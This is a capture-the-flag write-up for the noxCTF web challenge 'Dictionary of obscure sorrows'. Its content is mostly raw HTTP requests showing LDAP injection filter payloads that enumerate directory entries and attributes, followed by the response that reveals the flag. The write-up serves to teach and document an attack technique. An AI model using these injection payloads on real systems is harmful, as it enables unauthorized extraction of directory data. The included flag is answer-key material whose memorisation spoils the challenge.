CTFtime.org

Dictionary of obscure sorrows

by kazkiti / PwnaSonic

Tags: web ldap 

Rating: 5.0

# ▼▼▼Dictionary of obscure sorrows(Web:902point、11/531=2.1%)▼▼▼
**This writeup is written by [@kazkiti_ctf](https://twitter.com/kazkiti_ctf)**

```
There are a lot of obscure sorrows in our world.
Your job is not to find those that are plain in sight;
You need to seek further, look deeper.
Find the word that can not be written.
The most obscure sorrow of them all.

http://54.152.220.222/
```

---

## 【Identify the vulnerability】

```
GET /word.php?page=*)(ObjectClass=* ⇒Normal response!!
GET /word.php?page=*)(ObjectClass=1  ⇒Query returned empty
```

**LDAP injection !!**

---

## 【Search for flag】
```
GET /word.php?page=%4b*)(objectClass=* HTTP/1.1 K*
GET /word.php?page=%6b*)(objectClass=* HTTP/1.1 k*
GET /word.php?page=%4f*)(objectClass=* HTTP/1.1 O*
GET /word.php?page=%6f*)(objectClass=* HTTP/1.1 o*
GET /word.php?page=%56*)(objectClass=* HTTP/1.1 V*
GET /word.php?page=%76*)(objectClass=* HTTP/1.1 v*
GET /word.php?page=%57*)(objectClass=* HTTP/1.1 W*
GET /word.php?page=%77*)(objectClass=* HTTP/1.1 w*
GET /word.php?page=%41*)(objectClass=* HTTP/1.1 A*
GET /word.php?page=%61*)(objectClass=* HTTP/1.1 a*
GET /word.php?page=%4c*)(objectClass=* HTTP/1.1 L*
GET /word.php?page=%6c*)(objectClass=* HTTP/1.1 l*
GET /word.php?page=%53*)(objectClass=* HTTP/1.1 S*
GET /word.php?page=%73*)(objectClass=* HTTP/1.1 s*
GET /word.php?page=%59*)(objectClass=* HTTP/1.1 Y*
GET /word.php?page=%79*)(objectClass=* HTTP/1.1 y*
```

Compare with values that exist in html

```
/word.php?page=Koinophobia
/word.php?page=Klexos
/word.php?page=Kuebiko
/word.php?page=Onism
/word.php?page=Opia
/word.php?page=Vellichor
/word.php?page=Wytai
/word.php?page=Anemoia
/word.php?page=Ambedo
/word.php?page=Lalalalia
/word.php?page=Lachesism
/word.php?page=Lutalica
/word.php?page=Sonder
/word.php?page=Socha
/word.php?page=YuYi
```

```
Discover WORDS!! But it was not a flag...
/word.php?page=WORDS
```

---
## 【Search for other attribute values】

`GET /word.php` or `GET /config.php` ※config.php was discovered by the feeling

`Missing RDN inside ObjectClass(document)`

ObjectClass is `document`

---

## 【Investigate attributes of ObjectClass】

Attribute list of `document`

`http://software.fujitsu.com/jp/manual/manualfiles/M050000/B1WN4901/02/irepac/irep0289.htm#document`

```
cn (commonName)
description
seeAlso
l (localityName)
o (organizationName)
ou (organizationUnitName)
documentTitle
documentVersion
documentAuthor
documentLocation
documentPublisher
```

---

```
GET /word.php?page=*)(cn=* ⇒ Query returned empty
GET /word.php?page=*)(description=* ⇒ Normal response★
GET /word.php?page=*)(seeAlso=*  ⇒ Query returned empty
GET /word.php?page=*)(l=*   ⇒ Query returned empty
GET /word.php?page=*)(o=*   ⇒ Query returned empty
GET /word.php?page=*)(ou=*  ⇒ Query returned empty
GET /word.php?page=*)(documentTitle=*  ⇒ Query returned empty
GET /word.php?page=*)(documentVersion=*  ⇒ Query returned empty
GET /word.php?page=*)(documentAuthor=*  ⇒ Query returned empty
GET /word.php?page=*)(documentAuthor=*  ⇒ Query returned empty
GET /word.php?page=*)(documentPublisher=* ⇒ Normal response★
```

---

## 【exploit】

The format of flag is known by `noxctf{●●●●●} `

`GET /word.php?page=*)(description=*noxctf*`

```
HTTP/1.1 302 Found
Date: Sat, 08 Sep 2018 23:41:20 GMT
Server: Apache/2.4.18 (Ubuntu)
Location: http://54.152.220.222/
Content-Length: 3872
Content-Type: text/html; charset=UTF-8

<html><head>
<title>Lightweight Dictionary Of Obscure Sorrows</title>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="stylesheet" href="/assets/css/main.css">
</head>
<body class="subpage">


<header id="header">
<h1>Dictionary of <span>Obscure Sorrows</span></h1>
Menu
</header>



<div id="main">


<section class="wrapper style1">
<div class="inner">
<header class="align-center">
<h2>ƢƢƢƢ</h2>

So many sorrows.


</header>
<div class="video">
<div class="video-wrapper">
<iframe width="560" height="315" src="https://www.youtube.com/embed/s6zR2T9vn2c" frameborder="0" allowfullscreen=""></iframe>
</div>


noxCTF{K1NG_0F_LD4P}


</div>


</div>
</section>


<section class="wrapper ">
<div class="inner">
<header class="align-center">
<h2>Even more obsure sorrows</h2>

You can click on any of the links below to reach some more interesting words.


</header>
</div>
</section>

</div>


<footer id="footer">
<div class="inner">
<div class="flex flex-3">
<div class="col">
<h3>Words</h3>


</div>
<div class="col">
<h3>Some more</h3>

</div>
<div class="col">
<h3>More words</h3>

</div>
</div>
</div>
<div class="copyright">

© Untitled. Design: TEMPLATED. Images: Coverr. Video: Coverr.
</div>
</footer>

<script src="/assets/js/jquery.min.js"></script>
<script src="/assets/js/jquery.scrolly.min.js"></script>
<script src="/assets/js/skel.min.js"></script>
<script src="/assets/js/util.js"></script>
<script src="/assets/js/main.js"></script>


<nav id="menu">


</nav></body></html>
```

`noxCTF{K1NG_0F_LD4P}`

Comments